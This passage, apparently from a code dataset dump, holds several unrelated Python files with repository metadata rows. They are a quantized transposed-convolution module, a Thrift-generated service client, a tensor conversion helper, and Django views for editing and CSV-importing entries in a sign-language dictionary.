groups, bias, padding_mode, quant_desc_input, quant_desc_weight):
super(_QuantConvTransposeNd, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation,
transposed, output_padding, groups, bias, padding_mode)
self.init_quantizer(quant_desc_input, quant_desc_weight)
def _quant(self, input):
"""Apply quantization on input and weight
Function called by the classes lower in the hierarchy, which actually performs the quantization before forward
in the derivate class the particular Function.
Arguments:
input: in_features to quantize
Returns:
A tuple: (quant_in_feature, quant_weight)
"""
quant_input = self._input_quantizer(input)
quant_weight = self._weight_quantizer(self.weight)
return (quant_input, quant_weight)
class QuantConvTranspose1d(_QuantConvTransposeNd):
"""Quantized ConvTranspose1d"""
default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_CONVTRANSPOSE1D_WEIGHT_PER_CHANNEL
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
output_padding=0,
groups=1,
bias=True,
dilation=1,
padding_mode='zeros',
**kwargs):
kernel_size = _single(kernel_size)
stride = _single(stride)
padding = _single(padding)
dilation = _single(dilation)
output_padding = _single(output_padding)
quant_desc_input, quant_desc_weight = _utils.pop_quant_desc_in_kwargs(self.__class__, **kwargs)
super(QuantConvTranspose1d, self).__init__(
in_channels, out_channels, kernel_size, stride, padding, dilation,
True, output_padding, groups, bias, padding_mode,
quant_desc_input=quant_desc_input, quant_desc_weight=quant_desc_weight)
def forward(self, input, output_size=None):
if self.padding_mode != 'zeros':
raise ValueError('Only `zeros` padding mode is supported for QuantConvTranspose1d')
output_padding = self._output_padding(input, output_size, self.stride, self.padding, self.kernel_size)
quant_input, quant_weight = self._quant(input)
output = F.conv_transpose1d(quant_input, quant_weight, self.bias, self.stride, self.padding, output_padding,
self.groups, self.dilation)
return output
class QuantConvTranspose2d(_QuantConvTransposeNd):
"""Quantized ConvTranspose2d"""
default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_CONVTRANSPOSE2D_WEIGHT_PER_CHANNEL
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
output_padding=0,
groups=1,
bias=True,
dilation=1,
padding_mode='zeros',
**kwargs):
kernel_size = _pair(kernel_size)
stride = _pair(stride)
padding = _pair(padding)
dilation = _pair(dilation)
output_padding = _pair(output_padding)
quant_desc_input, quant_desc_weight = _utils.pop_quant_desc_in_kwargs(self.__class__, **kwargs)
super(QuantConvTranspose2d, self).__init__(
in_channels, out_channels, kernel_size, stride, padding, dilation,
True, output_padding, groups, bias, padding_mode,
quant_desc_input=quant_desc_input, quant_desc_weight=quant_desc_weight)
def forward(self, input, output_size=None):
if self.padding_mode != 'zeros':
raise ValueError('Only `zeros` padding mode is supported for QuantConvTranspose2d')
output_padding = self._output_padding(input, output_size, self.stride, self.padding, self.kernel_size)
quant_input, quant_weight = self._quant(input)
output = F.conv_transpose2d(quant_input, quant_weight, self.bias, self.stride, self.padding, output_padding,
self.groups, self.dilation)
return output
class QuantConvTranspose3d(_QuantConvTransposeNd):
"""Quantized ConvTranspose3d"""
default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_CONVTRANSPOSE3D_WEIGHT_PER_CHANNEL
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
output_padding=0,
groups=1,
bias=True,
dilation=1,
padding_mode='zeros',
**kwargs):
kernel_size = _triple(kernel_size)
stride = _triple(stride)
padding = _triple(padding)
dilation = _triple(dilation)
output_padding = _triple(output_padding)
quant_desc_input, quant_desc_weight = _utils.pop_quant_desc_in_kwargs(self.__class__, **kwargs)
super(QuantConvTranspose3d, self).__init__(
in_channels, out_channels, kernel_size, stride, padding, dilation,
True, output_padding, groups, bias, padding_mode,
quant_desc_input=quant_desc_input, quant_desc_weight=quant_desc_weight)
def forward(self, input, output_size=None):
if self.padding_mode != 'zeros':
raise ValueError('Only `zeros` padding mode is supported for QuantConvTranspose3d')
output_padding = self._output_padding(input, output_size, self.stride, self.padding, self.kernel_size)
quant_input, quant_weight = self._quant(input)
output = F.conv_transpose3d(quant_input, quant_weight, self.bias, self.stride, self.padding, output_padding,
self.groups, self.dilation)
return output
# Define alias with Quant prefix
_ConvNd = _QuantConvNd
Conv1d = QuantConv1d
Conv2d = QuantConv2d
Conv3d = QuantConv3d
ConvTranspose1d = QuantConvTranspose1d
ConvTranspose2d = QuantConvTranspose2d
ConvTranspose3d = QuantConvTranspose3d
| [
"[email protected]"
] | |
d6c42962c8c27b0253171b232edbef46fb681496 | b1182238bf0d26451d567e3100cea940be771ff1 | /hd-thrift-idl/hd-thrift-idl-social/src/main/python/SocialAdminService/ISocialAdminServiceDeleteAdminPost.py | 2ea38cd7fffadcfa9fbbd5dc18012fea42a09f4d | [] | no_license | ybg555/vue-tvBox | af6df0e07848efc1c2ac80ee8b7c16c65b790a40 | 57e3849e7f8272794e5a38d5e49bb68f7a44f286 | refs/heads/master | 2021-01-15T15:42:23.728423 | 2016-10-02T09:36:08 | 2016-10-02T09:36:08 | 55,936,790 | 1 | 0 | null | 2016-04-12T01:07:09 | 2016-04-11T02:52:05 | Python | UTF-8 | Python | false | true | 6,833 | py | #coding=utf-8
#
# Autogenerated by Thrift Compiler (0.9.2)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
def deleteAdminPost(self, post):
"""
删除帖子
@param post
@return
@author zhijian.li
Parameters:
- post
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def deleteAdminPost(self, post):
"""
删除帖子
@param post
@return
@author zhijian.li
Parameters:
- post
"""
self.send_deleteAdminPost(post)
return self.recv_deleteAdminPost()
def send_deleteAdminPost(self, post):
self._oprot.writeMessageBegin('deleteAdminPost', TMessageType.CALL, self._seqid)
args = deleteAdminPost_args()
args.post = post
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_deleteAdminPost(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = deleteAdminPost_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "deleteAdminPost failed: unknown result");
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["deleteAdminPost"] = Processor.process_deleteAdminPost
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_deleteAdminPost(self, seqid, iprot, oprot):
args = deleteAdminPost_args()
args.read(iprot)
iprot.readMessageEnd()
result = deleteAdminPost_result()
result.success = self._handler.deleteAdminPost(args.post)
oprot.writeMessageBegin("deleteAdminPost", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class deleteAdminPost_args:
"""
Attributes:
- post
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'post', (TAdminPost.ttypes.TAdminPost, TAdminPost.ttypes.TAdminPost.thrift_spec), None, ), # 1
)
def __init__(self, post=None,):
self.post = post
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.post = TAdminPost.ttypes.TAdminPost()
self.post.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deleteAdminPost_args')
if self.post is not None:
oprot.writeFieldBegin('post', TType.STRUCT, 1)
self.post.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.post)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deleteAdminPost_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deleteAdminPost_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| [
"[email protected]"
] | |
4ea78129b575c0fa392a02973b2e72fc68d1979c | c37414be07a423968c897887b0844830e349741f | /fastestimator/backend/to_number.py | 766952ad187cb9f583dbacd315fbeb6d65a050c5 | [
"Apache-2.0"
] | permissive | vbvg2008/fastestimator-future | 5175047a1acac42f7172f8b9bb326486ed25a5a0 | dbf7d597d1f97140f837345f6b06f1773d4fa299 | refs/heads/master | 2022-03-30T22:48:59.349348 | 2020-01-06T08:35:04 | 2020-01-06T08:35:04 | 227,687,532 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 214 | py | import tensorflow as tf
import torch
def to_number(data):
if isinstance(data, tf.Tensor):
data = data.numpy()
elif isinstance(data, torch.Tensor):
data = data.data.numpy()
return data
| [
"[email protected]"
] | |
d4b6091ec2ac16976849edd40296bf767472a246 | 4c14f3f73d4bf5d903a8108b22ab04523ec4d259 | /signbank/dictionary/update.py | d4ec23aafd3361c4da4b65e57af9c4f33c302ce3 | [
"BSD-3-Clause"
] | permissive | mbencherif/FinSL-signbank | acb8c8494a6fd644773abc06bea280dcea9be8d5 | a9b3dca3f01ac4672b81de7524af1371f603f604 | refs/heads/master | 2020-03-29T22:34:57.117754 | 2018-08-01T08:25:13 | 2018-08-01T08:25:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 31,013 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import re
import csv
import codecs
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden, HttpResponseBadRequest, Http404, \
HttpResponseNotAllowed, HttpResponseServerError
from django.shortcuts import render, get_object_or_404, redirect, reverse
from django.contrib import messages
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.decorators import permission_required, login_required
from django.db.models.fields import NullBooleanField
from django.utils.translation import ugettext as _
from django.core.exceptions import ObjectDoesNotExist, PermissionDenied
from tagging.models import TaggedItem, Tag
from guardian.shortcuts import get_perms, get_objects_for_user
from .models import Gloss, Dataset, Translation, Keyword, Language, Dialect, GlossURL, \
GlossRelation, GlossTranslations, FieldChoice, MorphologyDefinition, RelationToForeignSign, Relation
from .models import build_choice_list
from .forms import TagsAddForm, TagUpdateForm, TagDeleteForm, GlossRelationForm, RelationForm, \
RelationToForeignSignForm, MorphologyForm, CSVUploadForm
from ..video.models import GlossVideo
@permission_required('dictionary.change_gloss')
def update_gloss(request, glossid):
"""View to update a gloss model from the jeditable jquery form
We are sent one field and value at a time, return the new value once we've updated it."""
# Get the gloss object or raise a Http404 exception if the object does not exist.
gloss = get_object_or_404(Gloss, id=glossid)
# Make sure that the user has rights to edit this datasets glosses.
if 'view_dataset' not in get_perms(request.user, gloss.dataset):
return HttpResponseForbidden(_("You do not have permissions to edit Glosses of this dataset/lexicon."))
if request.method == "POST":
# Update the user on Gloss.updated_by from request.user
gloss.updated_by = request.user
old_idgloss = str(gloss)
field = request.POST.get('id', '')
value = request.POST.get('value', '')
if len(value) == 0:
value = ' '
elif value[0] == '_':
value = value[1:]
# in case we need multiple values
values = request.POST.getlist('value[]')
if field.startswith('keywords_'):
language_code_2char = field.split('_')[1]
return update_keywords(gloss, field, value, language_code_2char=language_code_2char)
elif field.startswith('relationforeign'):
return update_relationtoforeignsign(gloss, field, value)
# Had to add field != 'relation_between_articulators' because I changed its field name, and it conflicted here.
elif field.startswith('relation') and field != 'relation_between_articulators':
return update_relation(gloss, field, value)
elif field.startswith('morphology-definition'):
return update_morphology_definition(gloss, field, value)
elif field == 'dialect':
# expecting possibly multiple values
try:
gloss.dialect.clear()
for value in values:
lang = Dialect.objects.get(name=value)
gloss.dialect.add(lang)
gloss.save()
newvalue = ", ".join([str(g.name)
for g in gloss.dialect.all()])
except:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest("%s %s" % _("Unknown Dialect"), values, content_type='text/plain')
elif field.startswith('video_title'):
# If editing video title, update the GlossVideo's title
if request.user.has_perm('video.change_glossvideo'):
# Get pk after string "video_title"
video_pk = field.split('video_title')[1]
newvalue = value
try:
video = GlossVideo.objects.get(pk=video_pk)
video.title = value
video.save()
except GlossVideo.DoesNotExist:
return HttpResponseBadRequest('{error} {values}'.format(error=_('GlossVideo does not exist'), values=values),
content_type='text/plain')
else:
return HttpResponseForbidden('Missing permission: video.change_glossvideo')
elif field.startswith('glossurl-'):
if field == 'glossurl-create':
GlossURL.objects.create(url=value, gloss_id=glossid)
return HttpResponseRedirect(reverse('dictionary:admin_gloss_view', kwargs={'pk': gloss.id}))
else:
if request.user.has_perm('dictionary.change_gloss'):
glossurl_pk = field.split('glossurl-')[1]
newvalue = value
try:
glossurl = GlossURL.objects.get(pk=glossurl_pk)
glossurl.url = value
glossurl.save()
except GlossURL.DoesNotExist:
pass
else:
# Find if field is not in Gloss classes fields.
if field not in [f.name for f in Gloss._meta.get_fields()]:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest(_("Unknown field"), content_type='text/plain')
# Translate the value if a boolean
if isinstance(Gloss._meta.get_field(field), NullBooleanField):
newvalue = value
value = (value == 'Yes')
if value != ' ' or value != '':
# See if the field is a ForeignKey
if gloss._meta.get_field(field).get_internal_type() == "ForeignKey":
gloss.__setattr__(field, FieldChoice.objects.get(machine_value=value))
else:
gloss.__setattr__(field, value)
gloss.save()
# If the value is not a Boolean, return the new value
if not isinstance(value, bool):
f = Gloss._meta.get_field(field)
# for choice fields we want to return the 'display' version of the value
# Try to use get_choices to get correct choice names for FieldChoices
# If it doesn't work, go to exception and get flatchoices
try:
# valdict = dict(f.get_choices(include_blank=False))
valdict = dict(build_choice_list(field))
except:
valdict = dict(f.flatchoices)
# Some fields take ints
# if valdict.keys() != [] and type(valdict.keys()[0]) == int:
try:
newvalue = valdict.get(int(value), value)
# else:
except:
# either it's not an int or there's no flatchoices
# so here we use get with a default of the value itself
newvalue = valdict.get(value, value)
# If field is idgloss and if the value has changed
# Then change the filename on system and in glossvideo.videofile
if field == 'idgloss' and newvalue != old_idgloss:
try:
GlossVideo.rename_glosses_videos(gloss)
except (OSError, IOError):
# Catch error, but don't do anything for now.
return HttpResponseServerError(_("Error: Unable to change videofiles names."))
return HttpResponse(newvalue, content_type='text/plain')
else:
return HttpResponseNotAllowed(['POST'])
def update_keywords(gloss, field, value, language_code_2char):
"""Update the keyword field for the selected language"""
# Try to get the language object based on the language_code.
try:
language = Language.objects.get(language_code_2char=language_code_2char)
except Language.DoesNotExist:
# If the language_code does not exist in any Language.language_code_2char, return 400 Bad Request.
return HttpResponseBadRequest(_('A Language does not exist with language_code: ') + language_code_2char,
content_type='text/plain')
except Language.MultipleObjectsReturned:
# If multiple Languages exist with the same language_code_2char
return HttpResponseBadRequest(_('Multiple Languages with the same language_code exist, cannot edit because it '
'is unclear which languages translations to edit.'),
content_type='text/plain')
(glosstranslations, created) = GlossTranslations.objects.get_or_create(gloss=gloss, language=language)
glosstranslations.translations = value
glosstranslations.save()
# Save updated_by and updated_at field for Gloss
gloss.save()
return HttpResponse(value, content_type='text/plain')
def update_relation(gloss, field, value):
"""Update one of the relations for this gloss"""
(what, relid) = field.split('_')
what = what.replace('-', '_')
try:
rel = Relation.objects.get(id=relid)
except Relation.DoesNotExist:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest("%s '%s'" % _("Bad Relation ID"), relid, content_type='text/plain')
if not rel.source == gloss:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest(_("Relation doesn't match gloss"), content_type='text/plain')
if what == 'relationdelete':
print(("DELETE: ", rel))
rel.delete()
return HttpResponseRedirect(reverse('dictionary:admin_gloss_view', kwargs={'pk': gloss.id}))
elif what == 'relationrole':
# rel.role = value
try:
rel.role = FieldChoice.objects.get(machine_value=value)
except FieldChoice.DoesNotExist:
rel.role = value
rel.save()
# newvalue = rel.get_role_display()
newvalue = rel.role
elif what == 'relationtarget':
target = gloss_from_identifier(value)
if target:
rel.target = target
rel.save()
newvalue = str(target)
else:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest("%s '%s'" % _("Badly formed gloss identifier"), value,
content_type='text/plain')
else:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest("%s '%s'" % _("Unknown form field"), field, content_type='text/plain')
return HttpResponse(newvalue, content_type='text/plain')
def update_relationtoforeignsign(gloss, field, value):
"""Update one of the relations for this gloss"""
(what, relid) = field.split('_')
what = what.replace('-', '_')
try:
rel = RelationToForeignSign.objects.get(id=relid)
except RelationToForeignSign.DoesNotExist:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest("%s '%s'" % _("Bad RelationToForeignSign ID"), relid,
content_type='text/plain')
if not rel.gloss == gloss:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest(_("Relation doesn't match gloss"), content_type='text/plain')
if what == 'relationforeigndelete':
print(("DELETE: ", rel))
rel.delete()
return HttpResponseRedirect(reverse('dictionary:admin_gloss_view', kwargs={'pk': gloss.id}))
elif what == 'relationforeign_loan':
rel.loan = value == 'Yes'
rel.save()
elif what == 'relationforeign_other_lang':
rel.other_lang = value
rel.save()
elif what == 'relationforeign_other_lang_gloss':
rel.other_lang_gloss = value
rel.save()
else:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest("%s '%s'" % _("Unknown form field"), field, content_type='text/plain')
return HttpResponse(value, content_type='text/plain')
def gloss_from_identifier(value):
"""Given an id of the form idgloss (pk) return the
relevant gloss or None if none is found"""
# We need another way to add a Relation to a Gloss. One textfield can't serve all the possible ways of adding.
# One possible solution is to add two fields, one that serves adding by ID and other with Gloss name or name+id.
# However, no one is going to memorize or check for the id numbers and they will probably add with Gloss name only.
# Therefore the only useful implementation is to do it with the Gloss name only or with Glossname + id.
# TODO: Decide what to do here
"""
# See if 'value' is an int, should match if the user uses only an 'id' as a search string
try:
int(value)
is_int = True
except:
is_int = False
# If value is already int, try to match the int as IDGloss id.
if is_int:
try:
target = Gloss.objects.get(pk=int(value))
except ObjectDoesNotExist:
# If the int doesn't match anything, return
return HttpResponseBadRequest(_("Target gloss not found."), content_type='text/plain')
return target
# If 'value' is not int, then try to catch a string like "CAMEL (10)"
else:"""
# This regex looks from the Beginning of a string for IDGLOSS and then the id
# For example: "CAMEL (10)", idgloss="CAMEL" and pk=10
match = re.match('(.*) \((\d+)\)', value)
if match:
# print "MATCH: ", match
idgloss = match.group(1)
pk = match.group(2)
# print "INFO: ", idgloss, pk
# Try if target Gloss exists, if not, assign None to target, then it returns None
try:
target = Gloss.objects.get(pk=int(pk))
except ObjectDoesNotExist:
target = None
# print "TARGET: ", target
return target
# If regex doesn't match, return None
else:
return None
def add_relation(request):
"""Add a new relation instance"""
if request.method == "POST":
form = RelationForm(request.POST)
if form.is_valid():
role = form.cleaned_data['role']
sourceid = form.cleaned_data['sourceid']
targetid = form.cleaned_data['targetid']
try:
source = Gloss.objects.get(pk=int(sourceid))
except Gloss.DoesNotExist:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest(_("Source gloss not found."), content_type='text/plain')
target = gloss_from_identifier(targetid)
if target:
rel = Relation(source=source, target=target, role=role)
rel.save()
return HttpResponseRedirect(
reverse('dictionary:admin_gloss_view', kwargs={'pk': source.id}) + '?editrel')
else:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest(_("Target gloss not found."), content_type='text/plain')
else:
print(form)
# fallback to redirecting to the requesting page
return HttpResponseRedirect('/')
def add_relationtoforeignsign(request):
"""Add a new relationtoforeignsign instance"""
if request.method == "POST":
form = RelationToForeignSignForm(request.POST)
if form.is_valid():
sourceid = form.cleaned_data['sourceid']
loan = form.cleaned_data['loan']
other_lang = form.cleaned_data['other_lang']
other_lang_gloss = form.cleaned_data['other_lang_gloss']
try:
gloss = Gloss.objects.get(pk=int(sourceid))
except Gloss.DoesNotExist:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest(_("Source gloss not found."), content_type='text/plain')
rel = RelationToForeignSign(gloss=gloss, loan=loan, other_lang=other_lang,
other_lang_gloss=other_lang_gloss)
rel.save()
return HttpResponseRedirect(
reverse('dictionary:admin_gloss_view', kwargs={'pk': gloss.id}) + '?editrelforeign')
else:
print(form)
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest(_("Form not valid"), content_type='text/plain')
# fallback to redirecting to the requesting page
return HttpResponseRedirect('/')
def add_morphology_definition(request):
if request.method == "POST":
form = MorphologyForm(request.POST)
if form.is_valid():
parent_gloss = form.cleaned_data['parent_gloss_id']
role = form.cleaned_data['role']
morpheme_id = form.cleaned_data['morpheme_id']
morpheme = gloss_from_identifier(morpheme_id)
thisgloss = get_object_or_404(Gloss, pk=parent_gloss)
# create definition, default to not published
morphdef = MorphologyDefinition(
parent_gloss=thisgloss, role=role, morpheme=morpheme)
morphdef.save()
return HttpResponseRedirect(
reverse('dictionary:admin_gloss_view', kwargs={'pk': thisgloss.id}) + '?editmorphdef')
# Translators: Htt404
raise Http404(_('Incorrect request'))
def update_morphology_definition(gloss, field, value):
"""Update one of the relations for this gloss"""
(what, morph_def_id) = field.split('_')
what = what.replace('-', '_')
try:
morph_def = MorphologyDefinition.objects.get(id=morph_def_id)
except MorphologyDefinition.DoesNotExist:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest("%s '%s'" % _("Bad Morphology Definition ID"), morph_def_id,
content_type='text/plain')
if not morph_def.parent_gloss == gloss:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest(_("Morphology Definition doesn't match gloss"), content_type='text/plain')
if what == 'morphology_definition_delete':
print(("DELETE: ", morph_def))
morph_def.delete()
return HttpResponseRedirect(reverse('dictionary:admin_gloss_view', kwargs={'pk': gloss.id}))
elif what == 'morphology_definition_role':
# morph_def.role = value
morph_def.role = FieldChoice.objects.get(machine_value=value)
morph_def.save()
# newvalue = morph_def.get_role_display()
newvalue = morph_def.role.english_name
elif what == 'morphology_definition_morpheme':
morpheme = gloss_from_identifier(value)
if morpheme:
morph_def.morpheme = morpheme
morph_def.save()
newvalue = str(morpheme)
else:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest("%s '%s'" % _("Badly formed gloss identifier"), value,
content_type='text/plain')
else:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest("%s '%s'" % _("Unknown form field"), field, content_type='text/plain')
return HttpResponse(newvalue, content_type='text/plain')
@permission_required('dictionary.change_gloss')
def add_tag(request, glossid):
"""View to add a tag to a gloss"""
# default response
response = HttpResponse('invalid', content_type='text/plain')
if request.method == "POST":
gloss = get_object_or_404(Gloss, id=glossid)
if 'view_dataset' not in get_perms(request.user, gloss.dataset):
# If user has no permissions to dataset, raise PermissionDenied to show 403 template.
msg = _("You do not have permissions to add tags to glosses of this lexicon.")
messages.error(request, msg)
raise PermissionDenied(msg)
form = TagDeleteForm(request.POST)
if form.is_valid():
if form.cleaned_data['delete']:
tag = form.cleaned_data['tag']
# get the relevant TaggedItem
ti = get_object_or_404(
TaggedItem, object_id=gloss.id, tag__name=tag,
content_type=ContentType.objects.get_for_model(Gloss))
ti.delete()
response = HttpResponse(
'deleted', content_type='text/plain')
return response
form = TagUpdateForm(request.POST)
if form.is_valid():
tag = form.cleaned_data['tag']
# we need to wrap the tag name in quotes since it might contain spaces
Tag.objects.add_tag(gloss, '"%s"' % tag)
# response is new HTML for the tag list and form
response = render(request, 'dictionary/glosstags.html',
{'gloss': gloss, 'tagsaddform': TagsAddForm()})
else:
# If we are adding (multiple) tags, this form should validate.
form = TagsAddForm(request.POST)
if form.is_valid():
tags = form.cleaned_data['tags']
[Tag.objects.add_tag(gloss, str(x)) for x in tags]
response = render(request, 'dictionary/glosstags.html',
{'gloss': gloss, 'tagsaddform': TagsAddForm()})
return response
@login_required
@permission_required('dictionary.import_csv')
def import_gloss_csv(request):
"""
Check which objects exist and which not. Then show the user a list of glosses that will be added if user confirms.
Store the glosses to be added into sessions.
"""
glosses_new = []
glosses_exists = []
# Make sure that the session variables are flushed before using this view.
if 'dataset_id' in request.session: del request.session['dataset_id']
if 'glosses_new' in request.session: del request.session['glosses_new']
if request.method == 'POST':
form = CSVUploadForm(request.POST, request.FILES)
if form.is_valid():
dataset = form.cleaned_data['dataset']
if 'view_dataset' not in get_perms(request.user, dataset):
# If user has no permissions to dataset, raise PermissionDenied to show 403 template.
msg = _("You do not have permissions to import glosses to this lexicon.")
messages.error(request, msg)
raise PermissionDenied(msg)
try:
glossreader = csv.reader(codecs.iterdecode(form.cleaned_data['file'], 'utf-8'), delimiter=',', quotechar='"')
except csv.Error as e:
# Can't open file, remove session variables
if 'dataset_id' in request.session: del request.session['dataset_id']
if 'glosses_new' in request.session: del request.session['glosses_new']
# Set a message to be shown so that the user knows what is going on.
messages.add_message(request, messages.ERROR, _('Cannot open the file:' + str(e)))
return render(request, "dictionary/import_gloss_csv.html", {'import_csv_form': CSVUploadForm()}, )
else:
try:
for row in glossreader:
if glossreader.line_num == 1:
# Skip first line of CSV file.
continue
try:
# Find out if the gloss already exists, if it does add to list of glosses not to be added.
gloss = Gloss.objects.get(dataset=dataset, idgloss=row[0])
glosses_exists.append(gloss)
except Gloss.DoesNotExist:
# If gloss is not already in list, add glossdata to list of glosses to be added as a tuple.
if not any(row[0] in s for s in glosses_new):
glosses_new.append(tuple(row))
except IndexError:
# If row[0] does not exist, continue to next iteration of loop.
continue
except UnicodeDecodeError as e:
# File is not UTF-8 encoded.
messages.add_message(request, messages.ERROR, _('File must be UTF-8 encoded!'))
return render(request, "dictionary/import_gloss_csv.html", {'import_csv_form': CSVUploadForm()}, )
# Store dataset's id and the list of glosses to be added in session.
request.session['dataset_id'] = dataset.id
request.session['glosses_new'] = glosses_new
return render(request, "dictionary/import_gloss_csv_confirmation.html",
{#'import_csv_form': CSVUploadForm(),
'glosses_new': glosses_new,
'glosses_exists': glosses_exists,
'dataset': dataset,})
else:
# If form is not valid, set a error message and return to the original form.
messages.add_message(request, messages.ERROR, _('The provided CSV-file does not meet the requirements '
'or there is some other problem.'))
return render(request, "dictionary/import_gloss_csv.html", {'import_csv_form': form}, )
else:
# If request type is not POST, return to the original form.
csv_form = CSVUploadForm()
allowed_datasets = get_objects_for_user(request.user, 'dictionary.view_dataset')
# Make sure we only list datasets the user has permissions to.
csv_form.fields["dataset"].queryset = csv_form.fields["dataset"].queryset.filter(
id__in=[x.id for x in allowed_datasets])
return render(request, "dictionary/import_gloss_csv.html",
{'import_csv_form': csv_form}, )
@login_required
@permission_required('dictionary.import_csv')
def confirm_import_gloss_csv(request):
"""This view adds the data to database if the user confirms the action"""
if request.method == 'POST':
if 'cancel' in request.POST:
# If user cancels adding data, flush session variables
if 'dataset_id' in request.session: del request.session['dataset_id']
if 'glosses_new' in request.session: del request.session['glosses_new']
# Set a message to be shown so that the user knows what is going on.
messages.add_message(request, messages.WARNING, _('Cancelled adding CSV data.'))
return HttpResponseRedirect(reverse('dictionary:import_gloss_csv'))
elif 'confirm' in request.POST:
glosses_added = []
dataset = None
if 'glosses_new' and 'dataset_id' in request.session:
dataset = Dataset.objects.get(id=request.session['dataset_id'])
for gloss in request.session['glosses_new']:
